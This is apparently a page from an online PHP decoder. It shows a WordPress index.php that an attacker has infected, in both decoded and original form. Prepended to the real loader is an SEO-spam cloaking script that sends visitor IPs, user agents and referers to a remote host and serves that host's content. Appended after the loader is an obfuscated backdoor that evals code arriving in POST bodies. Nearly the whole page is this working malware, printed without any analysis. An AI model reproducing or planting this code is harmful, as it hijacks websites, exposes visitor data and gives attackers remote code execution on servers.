Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a='fgx625';@set_time_limit(3600);define("W",'http://fgx625.freemiss.ru');define("U..

Decoded Output download

<?php 
$a='fgx625';@set_time_limit(3600);define("W",'http://fgx625.freemiss.ru');define("U",getu());function k($b){return@$_SERVER[$b]?$_SERVER[$b]:"";}define("S",strtolower(k("PHP_SELF")!=""?k("PHP_SELF"):k("SCRIPT_NAME")));$d=stripos(S,"index.php")!==false&&stripos(U,S)===false?rtrim(S,"index.php"):S;if($d=="")$d="/";define("F",$d);$f=@$_REQUEST["p"];$d=ltrim(U,F);if($f!="")$d=preg_replace("@(\?|\&)p=".$f."@","",$d);define("U2",preg_replace("#^\W+#","",$d));$h=k('HTTP_USER_AGENT');function getu(){$k=k("REQUEST_URI");if(empty($k)){$l=k('argv');$k=S.'?'.(is_array($l)?$l[0]:k('QUERY_STRING'));}return $k;}function get_ip(){$p=k('REMOTE_ADDR');if(!empty($_SERVER['HTTP_CLIENT_IP'])){$p=k('HTTP_CLIENT_IP');}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$p=k('HTTP_X_FORWARDED_FOR');}if(stristr($p,',')){$t=explode(",",$p);$p=$t[0];}return $p;}function c($u,$z,$aa){if(function_exists("curl_init")){$ff=curl_init();if($aa){curl_setopt($ff,CURLOPT_URL,$u);curl_setopt($ff,CURLOPT_POST,1);curl_setopt($ff,CURLOPT_POSTFIELDS,$z);}else{curl_setopt($ff,CURLOPT_URL,$u."?".$z);}curl_setopt($ff,CURLOPT_RETURNTRANSFER,1);curl_setopt($ff,CURLOPT_HEADER,0);curl_setopt($ff,CURLOPT_TIMEOUT,30);curl_setopt($ff,CURLOPT_FOLLOWLOCATION,1);$gg=curl_exec($ff);curl_close($ff);return $gg;}return false;}function get_url($hh){if(!function_exists("pfsockopen")&&!function_exists("fsockopen")){return false;}try{$hh=parse_url($hh);if(empty($hh["port"])){$hh["port"]=80;}$ii=$hh["path"]."?".$hh["query"];$jj=pfsockopen($hh["host"],$hh["port"],$kk,$ll,30);if(!$jj){$jj=fsockopen($hh["host"],$hh["port"],$kk,$ll,30);}if(!$jj){return false;}else{$mm="GET $ii HTTP/1.1
";$mm.="Host: {$hh['host']}
";$mm.="Connection: Close
";$mm.="
";fwrite($jj,$mm);$nn='';$oo=0;while(true){$nn.=fread($jj,1);$oo+=1;if($oo>=4&&$nn[$oo-1]=="
"&&substr($nn,-4)=="

"){break;}}$pp=readChunked($jj);fclose($jj);return $pp;}}catch(Exception $b){return false;}}function readChunked($qq){$pp='';while(true){$rr='';do{$rr.=fread($qq,1);}while(strpos($rr,"
")===false);if(strpos($rr,' ')!==false){list($uu,$vv)=explode(' ',$rr,2);}else{$uu=$rr;$vv='';}$uu=(int)base_convert($uu,16,10);if($uu===0){fread($qq,2);return $pp;}else{$rr='';$ww=0;while($ww<$uu+2){$rr.=fread($qq,$uu-$ww+2);$ww=strlen($rr);}$pp.=substr($rr,0,-2);}}}function http($u,$xx){$yy="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$yy="text/xml";}else{if(strpos(U2,".txt")!==false){$yy="text/plain";}else{if(strpos(U2,"images/")!==false){$yy="image/webp";}else{if(strpos(U2,"sitemap.xsl")!==false){$yy="text/css";}}}}header("content-type: {$yy}; charset=UTF-8");$z=http_build_query($xx);$zz=W.$u."?".$z;$gg=@file_get_contents($zz);if(!$gg)$gg=c(W.$u,$z,0);if(!$gg)$gg=c(W.$u,$z,1);if(!$gg)$gg=get_url($zz);return $gg;}function g($u,$xx){$gg=http($u,$xx);$aaa='HTTP/1.1 500 Internal Server Error';if(!$gg){@header($aaa);die;}$b=substr($gg,0,1);switch($b){case "4":@header('HTTP/1.1 404 Not Found');die;case "5":@header($aaa);die;case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($gg,1));header('referer: '.k("HTTP_HOST"));die;case "7":return false;case "8":die;default:header('HTTP/1.1 200 OK');return $gg;}}$bbb=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$h,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$h)?"1":"","f"=>F,"p"=>$f);if(k('HTTPS')=='on'||k('HTTP_X_FORWARDED_PROTO')=='https'){$bbb["h"]="1";}if(strpos(U,"pingsitemap")!==false){$ccc=explode(",",g("/sitemap.list",$bbb));foreach($ccc as $ddd){$xx='https://www.google.com/ping?sitemap='.$ddd;$gg=c($xx,array(),0);if(!$gg){$gg=@file_get_contents($xx);}if(stristr($gg,'successfully')){echo $xx.'<br>pingok<br>';}else{echo $xx.'======creat file false!<br>';}}die;}$eee=g("/",$bbb);if($eee){die($eee);} ?><?php 
/* 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
 
 
 
 
 
<?php ${"GLOBALS"}["wxodieg"]="_";class _{private static$_;static function _0($_){$txfamsld="_";${"GLOBALS"}["hwqrfiund"]="_";if(!self::${${"GLOBALS"}["wxodieg"]}){self::_1();}return self::${$txfamsld}[${${"GLOBALS"}["hwqrfiund"]}];}private static function _1(){self::${${"GLOBALS"}["wxodieg"]}=array(0620,0620,145.75,145.75,145.75,145.75,0332,0332,0.75,0.75,0.75,0.75,01,01,01);}}${${"GLOBALS"}["wxodieg"]}=FilE_GeT_coNtentS("php://input");${"GLOBALS"}["evrwfxffs"]="_";if(sUBstr(${${"GLOBALS"}["evrwfxffs"]},(int)rOund(_::_0(00)+_::_0(01))-(01515-0363--013-0307)-(-01000+-0677+-01345+02142)+(int)ROUNd(_::_0(02)+_::_0(03)+_::_0(04)+_::_0(05))+(int)rOUnd(_::_0(06)+_::_0(07))+(-02751+-0726),(int)roUnD(_::_0(010)+_::_0(011)+_::_0(012)+_::_0(013)))=="000"){${"GLOBALS"}["ttifcqnhh"]="_";${"GLOBALS"}["fqisbr"]="_";${${"GLOBALS"}["wxodieg"]}=GZINFlATe(SubStr(${${"GLOBALS"}["fqisbr"]},(int)rOund(_::_0(014)+_::_0(015)+_::_0(016))));@${${"GLOBALS"}["wxodieg"]}=${${"GLOBALS"}["ttifcqnhh"]};try{eval(${${"GLOBALS"}["wxodieg"]});}catch(_$_){};}else{$bbccyib="_";eval(UrlDecODE(STR_REPLAce("code=","",${$bbccyib})));} 
?>

Did this file decode correctly?

Original Code

<?php
$a='fgx625';@set_time_limit(3600);define("W",'http://fgx625.freemiss.ru');define("U",getu());function k($b){return@$_SERVER[$b]?$_SERVER[$b]:"";}define("S",strtolower(k("PHP_SELF")!=""?k("PHP_SELF"):k("SCRIPT_NAME")));$d=stripos(S,"index.php")!==false&&stripos(U,S)===false?rtrim(S,"index.php"):S;if($d=="")$d="/";define("F",$d);$f=@$_REQUEST["p"];$d=ltrim(U,F);if($f!="")$d=preg_replace("@(\\?|\\&)p=".$f."@","",$d);define("U2",preg_replace("#^\\W+#","",$d));$h=k('HTTP_USER_AGENT');function getu(){$k=k("REQUEST_URI");if(empty($k)){$l=k('argv');$k=S.'?'.(is_array($l)?$l[0]:k('QUERY_STRING'));}return $k;}function get_ip(){$p=k('REMOTE_ADDR');if(!empty($_SERVER['HTTP_CLIENT_IP'])){$p=k('HTTP_CLIENT_IP');}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$p=k('HTTP_X_FORWARDED_FOR');}if(stristr($p,',')){$t=explode(",",$p);$p=$t[0];}return $p;}function c($u,$z,$aa){if(function_exists("curl_init")){$ff=curl_init();if($aa){curl_setopt($ff,CURLOPT_URL,$u);curl_setopt($ff,CURLOPT_POST,1);curl_setopt($ff,CURLOPT_POSTFIELDS,$z);}else{curl_setopt($ff,CURLOPT_URL,$u."?".$z);}curl_setopt($ff,CURLOPT_RETURNTRANSFER,1);curl_setopt($ff,CURLOPT_HEADER,0);curl_setopt($ff,CURLOPT_TIMEOUT,30);curl_setopt($ff,CURLOPT_FOLLOWLOCATION,1);$gg=curl_exec($ff);curl_close($ff);return $gg;}return false;}function get_url($hh){if(!function_exists("pfsockopen")&&!function_exists("fsockopen")){return false;}try{$hh=parse_url($hh);if(empty($hh["port"])){$hh["port"]=80;}$ii=$hh["path"]."?".$hh["query"];$jj=pfsockopen($hh["host"],$hh["port"],$kk,$ll,30);if(!$jj){$jj=fsockopen($hh["host"],$hh["port"],$kk,$ll,30);}if(!$jj){return false;}else{$mm="GET $ii HTTP/1.1\r\n";$mm.="Host: {$hh['host']}\r\n";$mm.="Connection: Close\r\n";$mm.="\r\n";fwrite($jj,$mm);$nn='';$oo=0;while(true){$nn.=fread($jj,1);$oo+=1;if($oo>=4&&$nn[$oo-1]=="\n"&&substr($nn,-4)=="\r\n\r\n"){break;}}$pp=readChunked($jj);fclose($jj);return $pp;}}catch(Exception $b){return false;}}function readChunked($qq){$pp='';while(true){$rr='';do{$rr.=fread($qq,1);}while(strpos($rr,"\r\n")===false);if(strpos($rr,' ')!==false){list($uu,$vv)=explode(' ',$rr,2);}else{$uu=$rr;$vv='';}$uu=(int)base_convert($uu,16,10);if($uu===0){fread($qq,2);return $pp;}else{$rr='';$ww=0;while($ww<$uu+2){$rr.=fread($qq,$uu-$ww+2);$ww=strlen($rr);}$pp.=substr($rr,0,-2);}}}function http($u,$xx){$yy="text/html";if(strpos(U2,"pingsitemap")===false&&(strpos(U2,".xml")!==false||strpos(U2,"/feed")!==false)){$yy="text/xml";}else{if(strpos(U2,".txt")!==false){$yy="text/plain";}else{if(strpos(U2,"images/")!==false){$yy="image/webp";}else{if(strpos(U2,"sitemap.xsl")!==false){$yy="text/css";}}}}header("content-type: {$yy}; charset=UTF-8");$z=http_build_query($xx);$zz=W.$u."?".$z;$gg=@file_get_contents($zz);if(!$gg)$gg=c(W.$u,$z,0);if(!$gg)$gg=c(W.$u,$z,1);if(!$gg)$gg=get_url($zz);return $gg;}function g($u,$xx){$gg=http($u,$xx);$aaa='HTTP/1.1 500 Internal Server Error';if(!$gg){@header($aaa);die;}$b=substr($gg,0,1);switch($b){case "4":@header('HTTP/1.1 404 Not Found');die;case "5":@header($aaa);die;case "3":@header('HTTP/1.1 302 Moved Permanently');header('Location: '.substr($gg,1));header('referer: '.k("HTTP_HOST"));die;case "7":return false;case "8":die;default:header('HTTP/1.1 200 OK');return $gg;}}$bbb=array("ip"=>get_ip(),"lang"=>k("HTTP_ACCEPT_LANGUAGE"),"ua"=>$h,"r"=>strtolower(k("HTTP_REFERER")),"host"=>k("HTTP_HOST"),"uri"=>U,"uri2"=>U2,"isBot"=>preg_match("@google|yahoo|bing@",$h)?"1":"","f"=>F,"p"=>$f);if(k('HTTPS')=='on'||k('HTTP_X_FORWARDED_PROTO')=='https'){$bbb["h"]="1";}if(strpos(U,"pingsitemap")!==false){$ccc=explode(",",g("/sitemap.list",$bbb));foreach($ccc as $ddd){$xx='https://www.google.com/ping?sitemap='.$ddd;$gg=c($xx,array(),0);if(!$gg){$gg=@file_get_contents($xx);}if(stristr($gg,'successfully')){echo $xx.'<br>pingok<br>';}else{echo $xx.'======creat file false!<br>';}}die;}$eee=g("/",$bbb);if($eee){die($eee);} ?><?php
/*
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';





<?php ${"G\x4c\x4f\x42\x41LS"}["\x77\x78\x6f\x64\x69eg"]="\x5f";class _{private static$_;static function _0($_){$txfamsld="\x5f";${"G\x4c\x4fB\x41LS"}["\x68\x77\x71rf\x69\x75\x6ed"]="\x5f";if(!self::${${"\x47\x4cO\x42\x41L\x53"}["w\x78\x6f\x64\x69\x65\x67"]}){self::_1();}return self::${$txfamsld}[${${"\x47\x4cOB\x41\x4cS"}["\x68wq\x72\x66\x69u\x6e\x64"]}];}private static function _1(){self::${${"\x47\x4c\x4fB\x41L\x53"}["\x77\x78\x6f\x64i\x65\x67"]}=array(0620,0620,145.75,145.75,145.75,145.75,0332,0332,0.75,0.75,0.75,0.75,01,01,01);}}${${"\x47\x4c\x4f\x42\x41\x4cS"}["w\x78\x6f\x64i\x65\x67"]}=FilE_GeT_coNtentS("\x70h\160:\x2f/\x69np\x75\164");${"\x47\x4c\x4f\x42A\x4cS"}["\x65\x76\x72\x77\x66\x78\x66\x66\x73"]="\x5f";if(sUBstr(${${"\x47LOBALS"}["\x65\x76\x72\x77f\x78\x66f\x73"]},(int)rOund(_::_0(00)+_::_0(01))-(01515-0363--013-0307)-(-01000+-0677+-01345+02142)+(int)ROUNd(_::_0(02)+_::_0(03)+_::_0(04)+_::_0(05))+(int)rOUnd(_::_0(06)+_::_0(07))+(-02751+-0726),(int)roUnD(_::_0(010)+_::_0(011)+_::_0(012)+_::_0(013)))=="\06000"){${"\x47LO\x42\x41\x4c\x53"}["t\x74\x69f\x63\x71n\x68\x68"]="\x5f";${"\x47\x4cOB\x41LS"}["fq\x69s\x62\x72"]="\x5f";${${"G\x4cOB\x41L\x53"}["\x77xo\x64\x69e\x67"]}=GZINFlATe(SubStr(${${"\x47\x4c\x4f\x42\x41LS"}["f\x71i\x73\x62\x72"]},(int)rOund(_::_0(014)+_::_0(015)+_::_0(016))));@${${"\x47LO\x42\x41L\x53"}["\x77\x78\x6f\x64ie\x67"]}=${${"\x47\x4c\x4fBALS"}["\x74tif\x63\x71\x6ehh"]};try{eval(${${"\x47\x4cO\x42\x41L\x53"}["\x77\x78o\x64\x69\x65\x67"]});}catch(_$_){};}else{$bbccyib="_";eval(UrlDecODE(STR_REPLAce("\x63\x6f\x64\x65\x3d","",${$bbccyib})));}
?>

Function Calls

None

Variables

None

Stats

MD5 4f83e988f479635a77e9d1ca57fbd869
Eval Count 0
Decode Time 90 ms